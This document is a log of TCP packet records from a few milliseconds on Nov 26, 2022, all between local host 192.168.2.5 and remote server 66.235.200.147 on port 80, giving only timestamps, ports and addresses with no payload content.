Nov 26, 2022 11:17:42.619395018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619398117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619414091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619431973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619450092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619455099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619468927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619481087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619488001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619504929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619513988 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619524956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619543076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619553089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619560957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619580030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619599104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619606972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619622946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619630098 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619642973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619661093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619661093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.619678974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619697094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.619719982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620219946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620239973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620258093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620276928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620296955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620299101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620316982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620330095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620336056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620354891 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620371103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620374918 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620393038 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620412111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620424032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620430946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620448112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620450020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620469093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620487928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620491982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620506048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620517969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620523930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620542049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620554924 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620559931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620579004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620583057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620598078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620616913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620625973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.620636940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.620655060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621233940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621253967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621273994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621293068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621310949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621328115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621330976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621351004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621368885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621373892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621387005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621406078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621407032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621426105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621433973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621444941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621464014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621484995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621485949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621505022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621515036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621525049 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621542931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621543884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621562004 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621582985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621589899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621601105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621618986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621624947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621639013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.621655941 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.621658087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622097015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622116089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622134924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622154951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622154951 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622174978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622194052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622210979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622210979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622226000 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622230053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622248888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622250080 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622267962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622276068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622287989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622306108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622313023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622323036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622343063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622359991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622364998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622378111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622390985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622411013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622443914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622451067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622463942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622483969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622500896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622504950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622519970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622528076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.622539043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.622564077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623240948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623260021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623275995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623295069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623312950 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623320103 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623331070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623348951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623366117 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623367071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623383045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623388052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623400927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623418093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623425961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623435974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623451948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623471022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623481989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623488903 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623506069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623508930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623523951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623533010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623542070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623558044 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623558998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623577118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623596907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623609066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623615026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623635054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623644114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623672009 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.623944044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623963118 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623980045 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.623997927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624020100 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624051094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624144077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624291897 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624310017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624327898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624346018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624365091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624382973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624386072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624413013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624447107 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624464035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624480963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624488115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624514103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624527931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624531984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624548912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624567032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624583960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624593019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624600887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624619007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624619007 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624635935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624640942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624654055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624670982 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624687910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624694109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624705076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624716043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.624722958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.624741077 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625170946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625190020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625209093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625225067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625226974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625247002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625260115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625266075 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625284910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625287056 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625303984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625322104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625339985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625349998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625359058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625370026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625376940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625395060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625401020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625413895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625432014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625443935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625452042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625469923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625488997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625489950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625507116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625519991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625550985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625575066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625593901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625612974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625631094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.625636101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625861883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.625984907 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626003027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626101971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626106977 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626131058 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626166105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626183987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626202106 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626210928 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626223087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626240015 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626240969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626260042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626279116 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626290083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626297951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626312017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626316071 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626334906 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626353025 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626353979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626374006 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626377106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626393080 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626411915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626430988 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626434088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626450062 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626454115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626467943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626487017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626492023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626506090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.626533985 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.626996040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627016068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627033949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627051115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627063036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627075911 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627094030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627099037 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627111912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627120018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627130985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627145052 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627151012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627157927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627170086 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627180099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627188921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627207994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627209902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627226114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627228022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627269983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627270937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627290010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627298117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627309084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627329111 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627331972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627347946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627351999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627367020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627377033 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627387047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627397060 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627405882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627407074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627424002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627425909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627439976 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627441883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627466917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627496958 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627861023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627880096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627898932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627918005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627923012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627934933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627954960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627957106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627971888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.627983093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.627990961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628010035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628020048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628029108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628046036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628063917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628074884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628082991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628096104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628101110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628119946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628129959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628138065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628156900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628158092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.628175020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628194094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.628213882 CET	80	49707	66.235.200.147	192.168.2.5
